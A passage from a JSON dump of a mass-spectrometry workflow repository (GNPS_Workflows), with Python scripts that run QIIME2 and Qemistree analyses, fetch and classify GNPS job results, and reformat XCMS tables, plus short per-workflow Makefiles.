parser.add_argument(\"conda_environment\")\n parser.add_argument(\"sirius_bin\")\n\n args = parser.parse_args()\n\n output_feature_qza = os.path.join(args.output_folder, \"feature-table.qza\")\n output_mgf_qza = os.path.join(args.output_folder, \"sirius.mgf.qza\")\n output_fragtree_qza = os.path.join(args.output_folder, \"fragmentation_trees.qza\")\n output_formula_qza = os.path.join(args.output_folder, \"formula.qza\")\n output_fingerprints_qza = os.path.join(args.output_folder, \"fingerprints.qza\")\n output_qemistree_qza = os.path.join(args.output_folder, \"qemistree.qza\")\n output_merged_feature_table_qza = os.path.join(args.output_folder, \"merged_feature_table.qza\")\n output_merged_data_qza = os.path.join(args.output_folder, \"merged_data.qza\")\n output_distance_matrix_qza = os.path.join(args.output_folder, \"distance_matrix.qza\")\n output_pcoa_qza = os.path.join(args.output_folder, \"pcoa.qza\")\n output_emperor_qza = os.path.join(args.output_folder, \"emperor.qzv\")\n\n all_cmd = []\n\n if \".biom\" in args.input_quant_table:\n cmd = \"source {} {} && LC_ALL=en_US && export LC_ALL && qiime tools import --input-path {} --output-path {} --type FeatureTable[Frequency]\".format(args.conda_activate_bin, args.conda_environment, args.input_quant_table, output_feature_qza)\n all_cmd.append(cmd)\n elif \".qza\" in args.input_quant_table:\n cmd = \"cp {} {}\".format(args.input_quant_table, output_feature_qza)\n all_cmd.append(cmd)\n elif \".csv\" in args.input_quant_table:\n print(\"TODO: Will handle mzmine2 input, would recommend using FMBN first\")\n exit(1)\n\n cmd = \"source {} {} && LC_ALL=en_US && export LC_ALL && qiime tools import --input-path {} --output-path {} --type MassSpectrometryFeatures\".format(args.conda_activate_bin, args.conda_environment, args.input_sirius_mgf, output_mgf_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree compute-fragmentation-trees --p-sirius-path {} \\\n --i-features {} \\\n --p-ppm-max 15 \\\n --p-profile orbitrap \\\n --p-ionization-mode positive \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-fragmentation-trees {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_mgf_qza, output_fragtree_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree rerank-molecular-formulas --p-sirius-path {} \\\n --i-features {} \\\n --i-fragmentation-trees {} \\\n --p-zodiac-threshold 0.95 \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-molecular-formulas {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_mgf_qza, output_fragtree_qza, output_formula_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree predict-fingerprints --p-sirius-path {} \\\n --i-molecular-formulas {} \\\n --p-ppm-max 20 \\\n --p-java-flags \"-Djava.io.tmpdir=./temp -Xms16G -Xmx64G\" \\\n --o-predicted-fingerprints {}'.format(args.conda_activate_bin, args.conda_environment, args.sirius_bin, output_formula_qza, output_fingerprints_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime qemistree make-hierarchy \\\n --i-csi-results {} \\\n --i-feature-tables {} \\\n --o-tree {} \\\n --o-merged-feature-table {} \\\n --o-merged-feature-data {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_fingerprints_qza, \\\n output_feature_qza, \\\n output_qemistree_qza, \\\n output_merged_feature_table_qza, \\\n output_merged_data_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime diversity beta-phylogenetic \\\n --i-phylogeny {} \\\n --p-metric \"weighted_unifrac\" \\\n --o-distance-matrix {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_merged_data_qza, \\\n output_distance_matrix_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime diversity pcoa \\\n --i-distance-matrix {} \\\n --o-pcoa {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_distance_matrix_qza, \\\n output_pcoa_qza)\n all_cmd.append(cmd)\n\n cmd = 'source {} {} && LC_ALL=en_US && export LC_ALL && qiime emperor plot \\\n --i-pcoa {} \\\n --m-metadata-file {} \\\n --p-ignore-missing-samples \\\n --o-visualization {}'.format(args.conda_activate_bin, args.conda_environment, \\\n output_pcoa_qza, \\\n args.input_metadata_table, \\\n output_emperor_qza)\n all_cmd.append(cmd)\n\n for cmd in all_cmd:\n print(cmd)\n os.system(cmd)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.8169934749603271, "alphanum_fraction": 0.8300653696060181, "avg_line_length": 24.5, "blob_id": "02df68251ddfdfedd44a31d6c64a8ede34b4d7a7", "content_id": "891c48a3c74261ee0128273b4548a8ae2a497a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 153, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/msms-chooser/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=msms-chooser\nTOOL_FOLDER_NAME=msms-chooser\nWORKFLOW_VERSION=release_14\n" }, { "alpha_fraction": 0.8231292366981506, "alphanum_fraction": 0.8367347121238708, "avg_line_length": 23.5, "blob_id": "9bae3b7cd9289ae5cf051e0b2c7cb9ff242822a5", "content_id": "a7a2bbfcbbbd4bafde0c4cf2e4ad6375f8abe66b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 147, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/qemistree/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=qemistree\nTOOL_FOLDER_NAME=qemistree\nWORKFLOW_VERSION=release_14\n" }, { "alpha_fraction": 0.6807028651237488, "alphanum_fraction": 0.6842378973960876, "avg_line_length": 44.15962600708008, "blob_id": "754617f7d7c00248285b0073aa13ced02990a594", "content_id": "c0f7d12a4be2f977eb0d1b098fe88cc13ab94583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9618, "license_type": "no_license", "max_line_length": 187, "num_lines": 213, "path": "/molnetenhancer/tools/molnetenhancer/chemClass2Network.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "from pyMolNetEnhancer import *\nimport pandas as pd\nimport os\nimport csv \nimport json\nimport networkx as nx\nfrom pathlib import Path\n\ninfer_numeric_types = True\n\ndef create_Folder(directory='Output Files'):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n #return directory\n\n#cURL requested GNPS file based on the user-defined GNPS job ID\ndef request_GNPS_file(GNPS_job_ID, directory):\n import requests\n from io import BytesIO\n from zipfile import ZipFile\n\n GNPS_job_ID = GNPS_job_ID\n result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=download_cytoscape_data\" % GNPS_job_ID) \n print('GNPS request success: ' + str(result.ok))\n zf = ZipFile(BytesIO(result.content))\n folder_name = directory + '/GNPS_output_graphML'\n zf.extractall(folder_name)\n zf.close()\n return folder_name; #returns the folder name of the GNPS_output_graphML folder (str)\n\n#cURL requested Varquest file based on the user-defined Varquest job ID\ndef request_Varquest_file(Varquest_job_ID, directory):\n import requests\n from io import BytesIO\n from zipfile import ZipFile\n\n Varquest_job_ID = Varquest_job_ID\n result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=view_significant\" % Varquest_job_ID) \n print('Varquest request success: ' + str(result.ok))\n zf = ZipFile(BytesIO(result.content))\n folder_name = directory + '/Varquest_output'\n zf.extractall(folder_name)\n zf.close()\n return folder_name; #returns the folder name of the Varquest_output folder (str)\n\n#cURL requested Dereplicator file based on the user-defined Dereplicator job ID\ndef request_Derep_file(Derep_job_ID, directory):\n import requests\n from io import BytesIO\n from zipfile import ZipFile\n\n Derep_job_ID = Derep_job_ID\n result = requests.post(\"https://gnps.ucsd.edu/ProteoSAFe/DownloadResult?task=%s&view=view_significant\" % Derep_job_ID) \n print('Dereplicator request success: ' + str(result.ok))\n zf = ZipFile(BytesIO(result.content))\n folder_name = directory + '/Derep_output'\n zf.extractall(folder_name)\n zf.close()\n return folder_name; #returns the folder name of the Derep_output folder (str)\n\n#proces GNPS file\ndef process_GNPS_file(GNPS_file):\n if 'clusterinfo_summary' in os.listdir(GNPS_file) and 'DB_result' in os.listdir(GNPS_file):\n netfile = GNPS_file + 'clusterinfo_summary/' + str(os.listdir(GNPS_file + 'clusterinfo_summary/')[0]) \n gnpslibfile = GNPS_file + 'DB_result/'+ str(os.listdir(GNPS_file + 'DB_result/')[0]) \n\n elif 'clusterinfosummarygroup_attributes_withIDs_withcomponentID' in os.listdir(GNPS_file):\n netfile = GNPS_file + 'clusterinfosummarygroup_attributes_withIDs_withcomponentID/' + str(os.listdir(GNPS_file + 'clusterinfosummarygroup_attributes_withIDs_withcomponentID/')[0])\n gnpslibfile = GNPS_file + 'result_specnets_DB/'+ str(os.listdir(GNPS_file + 'result_specnets_DB/')[0])\n\n else:\n netfile = GNPS_file + 'clusterinfosummary/' + str(os.listdir(GNPS_file + 'clusterinfosummary/')[0])\n gnpslibfile = GNPS_file + 'result_specnets_DB/'+ str(os.listdir(GNPS_file + 'result_specnets_DB/')[0])\n return gnpslibfile, netfile\n\n#add all chemical structural information output as dataframe items in list\ndef add_Chemical_Info(gnpslibfile, directory, nap_ID=None, Derep_job_ID=None, Varquest_job_ID=None, derepfile=None, varquestfile=None):\n\n gnpslib = pd.read_csv(gnpslibfile, sep='\\t')\n matches = [gnpslib]\n\n if nap_ID != None and nap_ID != 'None':\n nap = pd.read_csv(\"http://proteomics2.ucsd.edu/ProteoSAFe/DownloadResultFile?task=%s&block=main&file=final_out/node_attributes_table.tsv\" % nap_ID, sep = \"\\t\")\n matches.append(nap)\n elif nap_ID == None or nap_ID == 'None':\n nap = None \n\n if Derep_job_ID != None and Derep_job_ID != 'None':\n derep = pd.read_csv(derepfile + [s for s in os.listdir(derepfile) if \"DEREPLICATOR\" in s][0], sep = '\\t')\n matches.append(derep)\n elif Derep_job_ID == None or Derep_job_ID == 'None':\n derep = None\n\n if Varquest_job_ID != None and Varquest_job_ID != 'None':\n varquest = pd.read_csv(varquestfile +[s for s in os.listdir(varquestfile) if \"DEREPLICATOR\" in s][0], sep = '\\t')\n matches.append(varquest)\n elif Varquest_job_ID == None or Varquest_job_ID == 'None':\n varquest = None\n\n file_name = directory + '/SMILES.csv'\n out = unique_smiles(matches)\n out['df'].to_csv(file_name, quoting=csv.QUOTE_NONE, escapechar='&')\n print('SMILES have been written to \"'+file_name+'\"')\n return file_name, out; #returns the file name of the SMILES.csv (str)\n\n#convert SMILES to InchiKeys\ndef convert_SMILES_InchiKeys(SMILES_csv, out, directory):\n import requests\n from bs4 import BeautifulSoup\n from lxml import html\n\n smiles_df = pd.read_csv(SMILES_csv)\n\n InchiKeys_lst = []\n SMILES_failed = []\n fail_count = 0\n\n for i in range(len(smiles_df)):\n smile_str = smiles_df.loc[i]['SMILES']\n link = 'https://gnps-structure.ucsd.edu/inchikey?smiles=%s' % smile_str\n result = requests.get(link)\n soup = str(BeautifulSoup(result.content, 'html.parser'))\n\n if '<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">' in soup:\n SMILES_failed.append(smile_str)\n fail_count += 1\n InchiKeys_lst.append('InChIKey=XXXXXXXXXXXXXX-XXXXXXXXXX-X')#place holder for unidentified\n else:\n InchiKeys_lst.append('InChIKey=' + soup)\n print('Number of failed conversions is ' + str(fail_count))\n\n ikeys = pd.DataFrame(data=InchiKeys_lst)\n ikeys.columns = ['InChIKey']\n file_name = directory + '/InciKeys.txt'\n ikeys.to_csv(file_name, quoting=csv.QUOTE_NONE, escapechar='&')\n\n out['df']['inchikey'] = ikeys\n inchi_dic = make_inchidic(out)\n\n print('conversions have been written to \"'+file_name+'\"')\n return out, file_name, inchi_dic, SMILES_failed #returns dictionary, inchi_dic and list of failed\n\ndef get_Classy(InchiKeys, directory):\n get_classifications(InchiKeys)\n new_path = directory + '/all_json.json'\n os.rename('all_json.json', new_path)\n print('classifications have been written to all_json.json')\n\ndef create_ClassyFireResults(netfile, inchi_dic, directory):\n with open(directory + \"/all_json.json\") as tweetfile:\n jsondic = json.loads(tweetfile.read())\n\n df = make_classy_table(jsondic)\n df = df.rename(columns = {'class':'CF_class','smiles':'SMILES'})\n net = pd.read_csv(netfile, sep='\\t')\n final = molfam_classes(net,df,inchi_dic)\n\n #Renaming no matches in score columns to 0\n for key in final:\n if \"_score\" in key:\n final[key] = final[key].map({\"\" : 0.0}, na_action=\"ignore\")\n\n file_name = directory + \"/ClassyFireResults_Network.txt\"\n final.to_csv(file_name, sep = '\\t', index = False)\n print('created \"'+file_name+'\"')\n return final, file_name\n\ndef create_GraphML(GNPS_file, final, directory):\n if any(\"FEATURE\" in s for s in os.listdir(GNPS_file)):\n graphMLfile = GNPS_file + [x for x in os.listdir(GNPS_file) if 'FEATURE' in x][0]\n graphML = nx.read_graphml(graphMLfile)\n graphML_classy = make_classyfire_graphml(graphML,final)\n nx.write_graphml(graphML_classy, directory+\"/ClassyFireResults_Network.graphml\", infer_numeric_types = infer_numeric_types)\n elif any(\"METABOLOMICS\" in s for s in os.listdir(GNPS_file)):\n graphMLfile = GNPS_file + [x for x in os.listdir(GNPS_file) if 'METABOLOMICS' in x][0]\n graphML = nx.read_graphml(graphMLfile)\n graphML_classy = make_classyfire_graphml(graphML,final)\n nx.write_graphml(graphML_classy, directory+\"/ClassyFireResults_Network.graphml\", infer_numeric_types = infer_numeric_types)\n else:\n print('There is no graphML file for this GNPS molecular network job')\n print('graphML has been written to ClassyFireResults_Network.graphml')\n\ndef pack_User_Params(prob, overlap, top):\n user_Params = [prob, overlap, top]\n return user_Params\n\ndef unpack_User_Params(user_Params):\n prob = user_Params[0]\n overlap = user_Params[1]\n top = user_Params[2]\n return prob, overlap, top\n\ndef mass_2_Motifs(GNPS_file, MS2LDA_job_ID, ClassyFireResults_file, directory, user_Params):\n #import MS2LDA data\n motifs = pd.read_csv('http://ms2lda.org/basicviz/get_gnps_summary/%s' % MS2LDA_job_ID)\n edges = pd.read_csv(GNPS_file + 'networkedges_selfloop/' + str(os.listdir(GNPS_file +'networkedges_selfloop/')[0]), sep = '\\t')\n #unpack user parameters\n prob, overlap, top = unpack_User_Params(user_Params)\n #create network data with mapped motifs\n motif_network = Mass2Motif_2_Network(edges, motifs, prob, overlap, top)\n motif_network['edges'].to_csv('Mass2Motifs_Edges.tsv', sep='\\t',index=False)\n motif_network['nodes'].to_csv('Mass2Motifs_Nodes.tsv', sep='\\t',index=True)\n #create graphML file\n MG = make_motif_graphml(motif_network['nodes'],motif_network['edges'])\n #write graphML file\n nx.write_graphml(MG, os.path.join(directory, \"Motif_Network.graphml\"), infer_numeric_types = infer_numeric_types)\n final = pd.read_csv(ClassyFireResults_file, sep = \"\\t\")\n graphML_classy = make_classyfire_graphml(MG, final)\n nx.write_graphml(graphML_classy, os.path.join(directory, \"Motif_ChemicalClass_Network.graphml\"), infer_numeric_types = infer_numeric_types)\n print('Mass 2 Motifs graphML has been written to Motif_ChemicalClass_Network.graphml')" }, { "alpha_fraction": 0.801369845867157, "alphanum_fraction": 0.8150684833526611, "avg_line_length": 23.16666603088379, "blob_id": "9690998e8fd414c2a30dc32f87660633b366b947", "content_id": "2f71af4d7d3d7a6ccd64afbd780fb1f23f5bdff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 146, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/mshub-gc/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=mshub-gc\nTOOL_FOLDER_NAME=mshub-gc\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8488371968269348, "avg_line_length": 27.83333396911621, "blob_id": "c775c51d07076524532413aeee5c5ef0088ff196", "content_id": "70c3362dbfc8da55e0af98cc605dc07e39812c72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 172, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/molecular-librarysearch-gc/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molecular-librarysearch-gc\nTOOL_FOLDER_NAME=molecularsearch-gc\nWORKFLOW_VERSION=release_14" }, { "alpha_fraction": 0.8037974834442139, "alphanum_fraction": 0.8291139006614685, "avg_line_length": 25.16666603088379, "blob_id": "52ca3f7fb9929e487924fc0e8a116e47018fd28c", "content_id": "03dc8bc0b8b37b6f41ca7a016584ebd54b48ee51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 158, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/ms2lda_motifdb/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=ms2lda_motifdb\nTOOL_FOLDER_NAME=ms2lda_motifdb\nWORKFLOW_VERSION=release_12\n\n" }, { "alpha_fraction": 0.8165680766105652, "alphanum_fraction": 0.8402366638183594, "avg_line_length": 27, "blob_id": "97c0b7a2b28f7454525dcf0e1bfa8781f1e93a8e", "content_id": "254d2d0c3624854d413f86525ed0237135595466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 169, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/metabolomics-snets-v2/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=metabolomics-snets-v2\nTOOL_FOLDER_NAME=metabolomicsnetsv2\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.8291139006614685, "alphanum_fraction": 0.8417721390724182, "avg_line_length": 25.16666603088379, "blob_id": "1755dfb8e5f17b26a540292b6ab0c56045ff8416", "content_id": "1bf173b6f76ec0f123da14c21218a34d6fe02ebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 158, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/molnetenhancer/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molnetenhancer\nTOOL_FOLDER_NAME=molnetenhancer\nWORKFLOW_VERSION=release_13\n\n" }, { "alpha_fraction": 0.6227223873138428, "alphanum_fraction": 0.6304930448532104, "avg_line_length": 49.41891860961914, "blob_id": "4cc0e93c230df044898103d7a74920e4e37e04a7", "content_id": "60ea3317f73466e6c93a29af42995ebe7a669320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3732, "license_type": "no_license", "max_line_length": 187, "num_lines": 74, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/xcms_formatter.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 9 14:47:58 2018. Modified on April 1 2019.\n@author: zheng zhang and louis felix nothias\n@purpose: to convert the XCMS-(CAMERA)-(IIN) output into a diserable format for FBMN or FBMNxIIN\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport sys\n\ndef convert_to_feature_csv(input_filename, output_filename):\n #Check and convert for XCMS or XCMS-CAMERA for FBMN\n\n input_format_df = pd.read_csv(input_filename,index_col=None,sep='\\t')\n\n if 'annotation network number' not in input_format_df.columns:\n #Prepare left table with ID mz rt\n input_format_df = input_format_df.rename(columns={ \"Row.names\":\"row ID\", \"mzmed\":\"row m/z\",\"rtmed\":\"row retention time\"})\n\n table_part_left = input_format_df[['row ID', 'row m/z','row retention time']]\n\n #Prepare right table with ms filename\n list_data_filename = list(input_format_df.filter(regex='.mzML|.mzXML|.mzml|.mzxml|.raw|.cdf|.CDF|.mzData|.netCDF|.netcdf|.mzdata'))\n table_part_right = input_format_df[list_data_filename]\n\n ## Add Peak area\n for i in range(0,len(table_part_right.columns.values)):\n table_part_right.columns.values[i] += \" Peak area\"\n ## Do some table processing\n table_part_right = table_part_right.fillna(value=0)\n ##Remove the FT string from the first column\n new_column = table_part_left['row ID'].to_list()\n new_column = [w.replace('FT', '') for w in new_column]\n table_part_left_copy = pd.DataFrame(np.array([new_column]).T)\n table_part_left_copy.columns = ['row ID']\n table_part_left_copy['row ID'] = new_column\n table_part_left_copy[['row ID']] = table_part_left_copy[['row ID']].apply(pd.to_numeric)\n table_part_left = table_part_left.drop(['row ID'], axis=1)\n table_part_left_processed = pd.concat([table_part_left_copy, table_part_left], axis=1, join='inner')\n\n ## Join back the tables\n output_format = pd.concat([table_part_left_processed, table_part_right], axis=1, join='inner')\n output_format.to_csv(output_filename,index = False)\n\n #Check and convert for XCMS-CAMERA for IINxFBMN\n elif 'annotation network number' in input_format_df.columns:\n input_format_df = input_format_df.rename(columns={\"mzmed\":\"row m/z\", \"rtmed\":\"row retention time\"})\n\n table_part_left = input_format_df[['row ID', 'row m/z','row retention time','correlation group ID',\\\n 'annotation network number','best ion','auto MS2 verify','identified by n=',\\\n 'partners','neutral M mass']]\n\n #Prepare right table with ms filename\n list_data_filename = list(input_format_df.filter(regex='.mzML|.mzXML|.mzml|.mzxml|.raw|.RAW|.cdf|.CDF|.mzData|.netCDF|.netcdf|.mzdata'))\n table_part_right = input_format_df[list_data_filename]\n\n ## Add Peak area\n for i in range(0,len(table_part_right.columns.values)):\n table_part_right.columns.values[i] += \" Peak area\"\n # ## Do some table processing\n table_part_right = table_part_right.fillna(value=0)\n\n # ## Join back the tables\n output_format = pd.concat([table_part_left, table_part_right], axis=1, join='inner')\n output_format.to_csv(output_filename,index = False)\n\n else:\n print('Feature quantification table format is incorrect. Verify the input table or the option selection. Please provide an XCMS table FBMN or an XCMS-CAMERA for FBMNxIIN format.')\n\nif __name__==\"__main__\":\n # there should be obly one input file\n convert_to_feature_csv(sys.argv[1],sys.argv[2])\n" }, { "alpha_fraction": 0.8245614171028137, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 27.33333396911621, "blob_id": "672518498401650e4d18e5fa095c8af09b62af95", "content_id": "dd6f7640c9612399866b6a127c762d6203f8503a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 171, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/molecular-librarysearch-v2/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molecular-librarysearch-v2\nTOOL_FOLDER_NAME=molecularsearch\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.6569613814353943, "alphanum_fraction": 0.6596082448959351, "avg_line_length": 43.2734375, "blob_id": "85834f172b9b31bd4203d286299e82c1139eef69", "content_id": "118b47cc1367b46300a729a4f8ad3603cdb8e72d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5667, "license_type": "no_license", "max_line_length": 162, "num_lines": 128, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/run_qiime2.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nimport sys\nimport requests\nimport shutil\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('input_metadata_filename', help='input_metadata_filename')\n parser.add_argument('input_quantification_table', help='input_quantification_table')\n parser.add_argument('output_folder', help='output_folder')\n parser.add_argument(\"conda_activate_bin\")\n parser.add_argument(\"conda_environment\")\n args = parser.parse_args()\n\n output_metadata_filename = os.path.join(args.output_folder, \"qiime2_metadata.tsv\")\n output_manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n\n df_quantification = pd.read_csv(args.input_quantification_table, sep=\",\")\n\n \"\"\"Reading Metadata Filename and filling in empty entries\"\"\"\n if len(args.input_metadata_filename) > 2:\n df_metadata = pd.read_csv(args.input_metadata_filename, sep=\"\\t\")\n else:\n df_metadata = pd.DataFrame([{\"filename\": \"placeholder\"}])\n\n if not \"sample_name\" in df_metadata:\n df_metadata[\"sample_name\"] = df_metadata[\"filename\"]\n\n \"\"\"Checking if the set of filenames are fully covered, if not then we'll provide a place holder\"\"\"\n all_quantification_filenames = [key.replace(\"Peak area\", \"\").rstrip() for key in df_quantification.keys() if \"Peak area\" in key]\n metadata_filenames = []\n try:\n metadata_filenames = list(df_metadata[\"filename\"])\n except:\n metadata_filenames\n\n metadata_object_list = df_metadata.to_dict(orient=\"records\")\n for quantification_filename in all_quantification_filenames:\n if not quantification_filename in metadata_filenames:\n print(quantification_filename, \"not found\")\n metadata_object = {}\n metadata_object[\"filename\"] = quantification_filename\n metadata_object[\"sample_name\"] = quantification_filename\n metadata_object_list.append(metadata_object)\n\n \"\"\"Adding in missing filenames into the metadata\"\"\"\n new_output_metadata = pd.DataFrame(metadata_object_list)\n\n #Removing protected headers\n new_output_metadata = new_output_metadata.drop(columns=[\"feature\", \"#SampleID\"], errors=\"ignore\")\n\n output_columns = list(new_output_metadata.keys())\n output_columns.remove(\"sample_name\")\n output_columns.insert(0, \"sample_name\")\n\n new_output_metadata.to_csv(output_metadata_filename, index=False, sep=\"\\t\", columns=output_columns, na_rep=\"NaN\")\n\n \"\"\"Outputting Manifest Filename\"\"\"\n manifest_df = pd.DataFrame()\n manifest_df[\"sample_name\"] = new_output_metadata[\"sample_name\"]\n manifest_df[\"filepath\"] = new_output_metadata[\"filename\"]\n manifest_df.to_csv(output_manifest_filename, index=False, sep=\",\")\n\n #Running Qiime2\n local_qza_table = os.path.join(args.output_folder, \"qiime2_table.qza\")\n local_qza_relative_table = os.path.join(args.output_folder, \"qiime2_relative_table.qza\")\n local_qza_distance = os.path.join(args.output_folder, \"qiime2_distance.qza\")\n local_qza_pcoa = os.path.join(args.output_folder, \"qiime2_pcoa.qza\")\n local_qzv_emperor = os.path.join(args.output_folder, \"qiime2_emperor.qzv\")\n local_qza_biplot = os.path.join(args.output_folder, \"qiime2_biplot.qza\")\n local_qzv_biplot_emperor = os.path.join(args.output_folder, \"qiime2_biplot_emperor.qzv\")\n\n\n all_cmd = []\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime metabolomics import-mzmine2 \\\n --p-manifest {} \\\n --p-quantificationtable {} \\\n --o-feature-table {}\".format(args.conda_activate_bin, args.conda_environment, output_manifest_filename, args.input_quantification_table, local_qza_table))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity beta \\\n --i-table {} \\\n --p-metric cosine \\\n --o-distance-matrix {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_table, local_qza_distance))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity pcoa \\\n --i-distance-matrix {} \\\n --o-pcoa {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_distance, local_qza_pcoa))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime emperor plot \\\n --i-pcoa {} \\\n --m-metadata-file {} \\\n --o-visualization {} \\\n --p-ignore-missing-samples\".format(args.conda_activate_bin, args.conda_environment, local_qza_pcoa, output_metadata_filename, local_qzv_emperor))\n\n #Biplotting\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime feature-table relative-frequency \\\n --i-table {} \\\n --o-relative-frequency-table {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_table, local_qza_relative_table))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity pcoa-biplot \\\n --i-pcoa {} \\\n --i-features {} \\\n --o-biplot {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_pcoa, local_qza_relative_table, local_qza_biplot))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime emperor biplot \\\n --i-biplot {} \\\n --m-sample-metadata-file {} \\\n --p-number-of-features 10 \\\n --o-visualization {} \\\n --p-ignore-missing-samples\".format(args.conda_activate_bin, args.conda_environment, local_qza_biplot, output_metadata_filename, local_qzv_biplot_emperor))\n\n\n for cmd in all_cmd:\n os.system(cmd)\n\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.8375634551048279, "alphanum_fraction": 0.8477157354354858, "avg_line_length": 31.83333396911621, "blob_id": "9e43c51fd9efe42c648354d8624f39e4c038efc3", "content_id": "b5f71d29628a48138628bcf78ff70edb49df8e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 197, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/feature-based-molecular-networking/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", 